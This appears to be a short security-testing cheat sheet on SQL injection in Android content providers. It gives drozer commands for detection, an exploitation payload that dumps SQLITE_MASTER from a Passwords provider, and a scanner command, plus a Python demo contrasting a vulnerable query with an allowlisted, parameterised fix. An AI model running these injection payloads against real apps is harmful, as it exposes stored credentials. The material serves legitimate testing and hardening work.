# SQL Injections (Android)

## Manual, in a content provider

### Detection

```
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --selection "'"
```

and

```
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "'"
```

### Exploitation

```
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
```
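Why the `--projection` test above succeeds, and the provider-side fix, as an added example that is not part of the original page: a Python `sqlite3` model of a provider that concatenates the caller's projection and selection into its SQL text. The `Pins` table, the column names and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the provider's SQLite file.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (service TEXT, username TEXT, password TEXT)")
    db.execute("CREATE TABLE Pins (pin TEXT)")  # assumed second table
    db.execute("INSERT INTO Passwords VALUES ('mail', 'alice', 's3cret')")
    return db

def build_query(table, projection, selection=None):
    # Model of plain string assembly: SELECT <projection> FROM <table> WHERE <selection>
    sql = "SELECT " + ", ".join(projection) + " FROM " + table
    if selection:
        sql += " WHERE " + selection
    return sql

def vulnerable_query(db, projection, selection=None):
    # Caller-controlled projection and selection go into the SQL text unchecked.
    return db.execute(build_query("Passwords", projection, selection)).fetchall()

ALLOWED_COLUMNS = {"service", "username"}  # columns the provider agrees to expose

def hardened_query(db, projection, service):
    # 1. Projection must consist only of allowlisted column names.
    projection = projection or sorted(ALLOWED_COLUMNS)
    rejected = [col for col in projection if col not in ALLOWED_COLUMNS]
    if rejected:
        raise ValueError(f"projection not allowed: {rejected!r}")
    # 2. The WHERE clause is fixed; the caller supplies only a bound value.
    sql = build_query("Passwords", projection, "service = ?")
    return db.execute(sql, (service,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = ["* FROM SQLITE_MASTER WHERE type='table';--"]  # projection from this page
    print(build_query("Passwords", payload))  # the real FROM clause ends up commented out
    print([row[1] for row in vulnerable_query(db, payload)])
    try:
        hardened_query(db, payload, "mail")
    except ValueError as exc:
        print("rejected:", exc)
    print(hardened_query(db, ["service", "username"], "mail"))
```

On Android the corresponding controls are a projection map with strict mode on `SQLiteQueryBuilder` (`setProjectionMap`, `setStrict(true)`) and `selectionArgs` for caller-supplied values.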

### Automatic

```
dz> run scanner.provider.injection -a com.example.targetapp
```
